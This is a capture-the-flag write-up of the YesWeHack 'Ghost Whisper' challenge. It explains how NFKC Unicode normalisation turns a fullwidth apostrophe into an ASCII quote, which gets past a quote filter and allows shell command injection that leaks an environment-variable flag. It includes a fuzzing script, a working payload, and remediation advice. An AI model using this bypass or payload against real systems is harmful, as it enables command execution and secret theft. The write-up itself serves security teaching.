Unicode Normalization to Command Injection RCE - YesWeHack 10-25: Ghost Whisper
TL;DR
- User input is embedded into a shell command using single quotes.
- ASCII quotes are filtered before Unicode normalisation.
- A fullwidth apostrophe normalises to ' under NFKC, bypassing the filter.
- Quote injection breaks out of the string, enabling command execution and flag leakage.
Description
A mysterious website lets you whisper to ghosts. But can you shatter the veil of silence and make your own voice heard?
Solution
In this writeup, we'll review the latest YesWeHack Dojo challenge, created by Brumens 🎃
Follow me on Twitter and LinkedIn (and everywhere else 🔪) for more hacking content! 🥰
Source code review
setup.py
import os
os.chdir('tmp')
os.mkdir('templates')
os.environ["FLAG"] = flag
with open('templates/index.html', 'w') as f:
    f.write('''
<!DOCTYPE html>
<html lang="en">
SNIPPED
</html>
'''.strip())
After snipping the HTML, there isn't much code left in the setup script. We know the flag is in an environment variable and the app uses templates, maybe SSTI?
app.py
import os, unicodedata
from urllib.parse import unquote
from jinja2 import Environment, FileSystemLoader
template = Environment(
    autoescape=True,
    loader=FileSystemLoader('/tmp/templates'),
).get_template('index.html')
os.chdir('/tmp')
def main():
    whisperMsg = unquote("OUR_INPUT")
    # Normalize dangerous characters
    whisperMsg = unicodedata.normalize("NFKC", whisperMsg.replace("'", "_"))
    # Run a command and capture its output
    with os.popen(f"echo -n '{whisperMsg}' | hexdump") as stream:
        hextext = f"{stream.read()} | {whisperMsg}"
        print( template.render(msg=whisperMsg, hextext=hextext) )
main()
- All single quotes (') in our input are replaced with underscores (_)
- Input is normalised using "NFKC" normalisation*
- Input is inserted into an echo command, which is piped to hexdump
- Input and [hex-converted] output of the command are rendered as a template
*NFKC (compatibility fold + canonical compose) collapses many visually-similar/codepoint-distinct characters (full-width forms, ligatures, some superscripts etc) into a standardised form. Sometimes this folding produces an ASCII character that an earlier filter was supposed to block, leading to useful character injections 👀
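To make the folding concrete, here is a minimal sketch using Python's standard unicodedata module. The sample characters are my own picks for illustration, not taken from the challenge.

```python
import unicodedata

# Illustrative samples (assumed, not from the challenge source).
samples = {
    "fullwidth A": "\uff21",
    "fi ligature": "\ufb01",
    "superscript two": "\u00b2",
    "fullwidth apostrophe": "\uff07",
}

for label, ch in samples.items():
    folded = unicodedata.normalize("NFKC", ch)
    # Show the original code point next to its NFKC form.
    print(f"{label}: U+{ord(ch):04X} -> {folded!r}")
```

Each of these is a distinct code point before normalisation and plain ASCII afterwards, which is exactly what a filter running too early will miss.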
Testing functionality
How cute is that ghost?! 👻 Let's start by entering a random string as an input 😺

We'll see the hex output from the command is printed alongside the normalised message (separated by a |)
0000000 656d 776f 0000004 | meow
Unhex those characters and we'll find our original input. It's jumbled because hexdump prints 16-bit words by default, which swaps each pair of bytes on little-endian systems.
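The byte swapping can be undone with a few lines of Python. This is a rough sketch, assuming default hexdump output from a little-endian host with the offset columns already stripped; decode_hexdump_words is a hypothetical helper name.

```python
from typing import Optional


def decode_hexdump_words(words: str, length: Optional[int] = None) -> bytes:
    """Rebuild the original bytes from hexdump's 16-bit words.

    Assumes a little-endian host, so each printed word is high byte first
    while the input stream had the low byte first.
    """
    out = bytearray()
    for word in words.split():
        value = int(word, 16)
        out.append(value & 0xFF)  # low byte appeared first in the input
        out.append(value >> 8)    # high byte appeared second
    # hexdump pads odd-length input with a zero byte; trim if length is known.
    return bytes(out[:length]) if length is not None else bytes(out)


print(decode_hexdump_words("656d 776f"))
```

Passing the byte count from hexdump's final offset line as length drops the padding byte when the input has an odd number of bytes.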
unhex 656d776f
emwo
Let's make a short script to explore further.
import os
import unicodedata
whisperMsg = input()
whisperMsg = unicodedata.normalize("NFKC", whisperMsg.replace("'", "_"))
with os.popen(f"echo -n '{whisperMsg}' | hexdump") as stream:
    hextext = f"{stream.read()} | {whisperMsg}"
    print(hextext)
We'll see that submitting 'meow' will trigger the replacement resulting in _meow_. This is important because if we wanted to inject into the command, we would want to close off the existing quote.
python test.py
'meow'
0000000 6d5f 6f65 5f77
0000006
| _meow_
Command Injection
If we can perform command injection, decoding the hexdump output will be trivial. Unfortunately, the developer used single quotes:
echo -n '$(whoami)'
$(whoami)
Instead of double quotes:
echo -n "$(whoami)"
crystal
Yep, our input is treated as a literal string. We need to find a way to inject a single quote.
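A quick way to reason about this is to count quotes. The sketch below is a deliberately simplified model of shell quoting (it ignores double quotes and backslashes), and inside_single_quotes is a hypothetical helper, not part of the challenge.

```python
def inside_single_quotes(command: str, needle: str) -> bool:
    """Return True if the first occurrence of needle starts inside '...'.

    Simplified model: only single quotes are tracked.
    """
    index = command.index(needle)
    # An odd number of quotes before the needle means a quote is still open.
    return command[:index].count("'") % 2 == 1


print(inside_single_quotes("echo -n '$(whoami)'", "$(whoami)"))
print(inside_single_quotes("echo -n 'meow' $FLAG '' | hexdump", "$FLAG"))
```

Anything that starts inside an open single quote is literal text to the shell; anything outside is subject to expansion.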
export FLAG=solved
We need to be careful not to break the command syntax. Try the input: meow' $FLAG '
echo -n 'meow' $FLAG '' | hexdump
0000000 656d 776f 7320 6c6f 6576 2064
000000c
It works. We could even comment out the hexdump part with meow' $FLAG '' #
echo -n 'meow' $FLAG '' # | hexdump
meow solved
We have confirmed the command injection is easy to exploit. Now we need to bypass the filter.
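To see how the payload reshapes the command without running anything, we can rebuild the string the same way the app does and tokenise it with shlex. This is only a sketch: build_command is a hypothetical wrapper around the app's f-string, and shlex approximates shell word splitting without expanding variables.

```python
import shlex


def build_command(whisper_msg: str) -> str:
    # Same f-string shape as the challenge's os.popen call.
    return f"echo -n '{whisper_msg}' | hexdump"


benign = build_command("meow")
injected = build_command("meow' $FLAG '")

print(injected)
# In the benign case the message is a single argument to echo.
print(shlex.split(benign))
# In the injected case $FLAG becomes its own, unquoted word.
print(shlex.split(injected))
```

Once $FLAG sits outside the quotes as a separate word, the real shell will expand it before echo ever runs.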
Unicode Overflow
Unicode codepoint truncation - also called a Unicode overflow attack - happens when a server tries to store a Unicode character in a single byte. Because the maximum value of a byte is 255, an overflow can be crafted to produce a specific ASCII character.
PortSwigger: Bypassing character blocklists with Unicode overflows
Shazzer: Unicode table
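To make the truncation idea concrete, here is a minimal sketch, assuming a hypothetical server that keeps only the low byte of each code point (truncate_to_byte is an illustrative helper, not something from the challenge). It also checks what NFKC does to the same character, since truncation and normalisation are separate mechanisms.

```python
import unicodedata


def truncate_to_byte(ch: str) -> str:
    # Assumed behaviour of a naive server: keep only the low 8 bits.
    return chr(ord(ch) & 0xFF)


# Code points in a small range whose low byte equals 0x27 (ASCII single quote).
candidates = [cp for cp in range(0x100, 0x1000) if cp & 0xFF == 0x27]
print([f"U+{cp:04X}" for cp in candidates[:4]])

h_stroke = chr(0x127)  # LATIN SMALL LETTER H WITH STROKE
print(repr(truncate_to_byte(h_stroke)))
# NFKC does not turn this character into a quote.
print(repr(unicodedata.normalize("NFKC", h_stroke)))
```

A character that overflows to a quote under byte truncation is therefore not automatically useful against a normaliser, and vice versa.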
Normalisation isn't strictly truncation, but the idea carries over: maybe we can find a Unicode character which becomes a single quote when normalised with NFKC 🤔 Here's a quick fuzzing script:
import unicodedata
for cp in range(0x110000):
    c = chr(cp)
    norm = unicodedata.normalize("NFKC", c)
    # Skip the ASCII quotes themselves
    if cp in (0x27, 0x22):
        continue
    if "'" in norm or '"' in norm:
        try:
            name = unicodedata.name(c)
        except ValueError:
            name = "<no name>"
        print(f"U+{cp:04X}\t{name}\t{c}\t->\t{norm!r}")
It finds a single quote Unicode character that looks just like the ASCII version to the untrained eye.
python uni_test.py
U+FF02 FULLWIDTH QUOTATION MARK ＂ -> '"'
U+FF07 FULLWIDTH APOSTROPHE ＇ -> "'"
We can easily test this by converting to hex. Normal quote:
hex \'
27
Unicode quote:
hex ＇
efbc87
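The same check can be done in Python, along with a side-by-side of the two possible orderings of filter and normalisation. This is a sketch: the function names are mine, and only filter_then_normalise mirrors the order used in app.py.

```python
import unicodedata

FULLWIDTH_APOSTROPHE = "\uff07"


def filter_then_normalise(msg: str) -> str:
    # Order used by the challenge: the filter never sees U+FF07 as a quote.
    return unicodedata.normalize("NFKC", msg.replace("'", "_"))


def normalise_then_filter(msg: str) -> str:
    # Reversed order: U+FF07 is folded to ' first, then replaced.
    return unicodedata.normalize("NFKC", msg).replace("'", "_")


print("'".encode("utf-8").hex())
print(FULLWIDTH_APOSTROPHE.encode("utf-8").hex())
print(filter_then_normalise("meow" + FULLWIDTH_APOSTROPHE))
print(normalise_then_filter("meow" + FULLWIDTH_APOSTROPHE))
```

Only the first ordering lets an ASCII quote survive into the command string.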
We will supply the payload: meow＇ $FLAG ＇＇ #
python test.py
meow＇ $FLAG ＇＇ #
meow solved | meow' $FLAG '' #
It works 🙏 Now to repeat it against the real challenge.
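Since app.py passes the input through unquote, a percent-encoded payload should decode back to the same string. Whether the real challenge form needs this encoding is an assumption on my part; the sketch below just shows the round trip with the standard library.

```python
from urllib.parse import quote, unquote

# Payload written with escapes so the fullwidth apostrophes (U+FF07) are explicit.
payload = "meow\uff07 $FLAG \uff07\uff07 #"

# safe="" percent-encodes every reserved character, including '$' and '#'.
encoded = quote(payload, safe="")
print(encoded)

# unquote is the same call the app applies to its input.
print(unquote(encoded) == payload)
```

The encoded form is handy when a browser or proxy would otherwise mangle the non-ASCII characters.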

Flag: FLAG{Gh0s7_S4y_BOOO000oooo}
Remediation
- Call commands without shell (swap os.popen with subprocess.run) so user input can't break out or inject new commands
- Specify allowed characters instead of filtering bad characters
- Perform validation checks after processing (normalisation)
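The three points above can be sketched as follows. This is one possible shape rather than the challenge author's fix: the allowlist pattern and the function names are assumptions, and hexdump_message expects a hexdump binary on the PATH.

```python
import re
import subprocess
import unicodedata

# Hypothetical allowlist: letters, digits, spaces and a little punctuation.
ALLOWED = re.compile(r"[A-Za-z0-9 _.,!?-]*")


def clean_message(raw: str) -> str:
    # Normalise first, so validation sees the final form of the input.
    normalised = unicodedata.normalize("NFKC", raw)
    if not ALLOWED.fullmatch(normalised):
        raise ValueError("message contains disallowed characters")
    return normalised


def hexdump_message(raw: str) -> str:
    msg = clean_message(raw)
    # No shell involved: the message is passed on stdin, never parsed as a command.
    result = subprocess.run(
        ["hexdump"], input=msg.encode(), capture_output=True, check=True
    )
    return result.stdout.decode()
```

With this ordering, a fullwidth apostrophe is folded to an ASCII quote before validation and rejected, and even a missed character could not reach a shell.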
Summary (TLDR)
This was a cute Halloween challenge featuring a basic command injection vulnerability 🎃 Things were complicated slightly by a filter which replaced the single quote characters needed to escape the string 👻 Luckily for us, the NFKC normalisation step introduced a second weakness: a Unicode normalisation bypass, in the same spirit as a Unicode overflow 🦇 Since the character validation occurred before the normalisation, sending a specially crafted Unicode character was sufficient to bypass the filter 😱